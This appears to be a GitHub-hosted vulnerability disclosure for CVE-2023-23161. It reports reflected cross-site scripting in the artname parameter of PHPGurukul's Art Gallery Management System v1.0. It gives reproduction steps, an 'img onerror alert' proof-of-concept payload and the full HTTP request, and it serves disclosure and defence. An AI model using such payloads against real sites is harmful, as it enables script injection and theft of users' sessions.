Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
> [Suggested description]
> A reflected cross-site scripting (XSS) vulnerability in Art Gallery
> Management System Project v1.0 allows attackers to execute arbitrary
> web scripts or HTML via a crafted payload injected into the artname
> parameter under ART TYPE option in the navigation bar.
>
> ------------------------------------------
>
> [Additional Information]
> Steps to Reproduce:
> 1. Navigate to the Products page by clicking on "ART TYPE".
> 4. Now insert the XSS payload and click on "artname" parameter in the URL and click on ENTER to submit the request. Payload: <img%20src=1%20onerror=alert(document.domain)>
> 5. After clicking on ENTER the XSS payload is executed and the alert Pops up with the domain name.
>
> ############ Product Page Request ############
>
> GET /Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1
> Host: localhost
> Cache-Control: max-age=0
> sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
> sec-ch-ua-mobile: ?0
> sec-ch-ua-platform: "Windows"
> Upgrade-Insecure-Requests: 1
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
> Sec-Fetch-Site: none
> Sec-Fetch-Mode: navigate
> Sec-Fetch-User: ?1
> Sec-Fetch-Dest: document
> Accept-Encoding: gzip, deflate
> Accept-Language: en-US,en;q=0.9
> Cookie: PHPSESSID=hub8pub9s5c1j18cva9594af3q
> Connection: close
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> https://phpgurukul.com/
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Art Gallery Management System Project - Art Gallery Management System Project - V 1.0
>
> ------------------------------------------
>
> [Affected Component]
> http://localhost/Art-Gallery-MS-PHP/product.php?cid=1&&artname=Sculptures
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Cross-Site Scripting (XSS) is a type of vulnerability that allows an attacker to inject malicious code into a website. This code is executed by the victim's web browser, allowing the attacker to steal sensitive information such as login credentials, or to manipulate the content of the website for malicious purposes.
> XSS attacks can we used to perform a variety of malicious actions including:
> 1. Stealing sensitive information
> 2. Redirecting the victim to another webpage
> 3. Executing arbitrary code
> 4. Manipulating the appearance of the website
>
> ------------------------------------------
>
> [Reference]
> https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/
> https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
>
> ------------------------------------------
>
> [Discoverer]
> Rahul Patwari
Use CVE-2023-23161.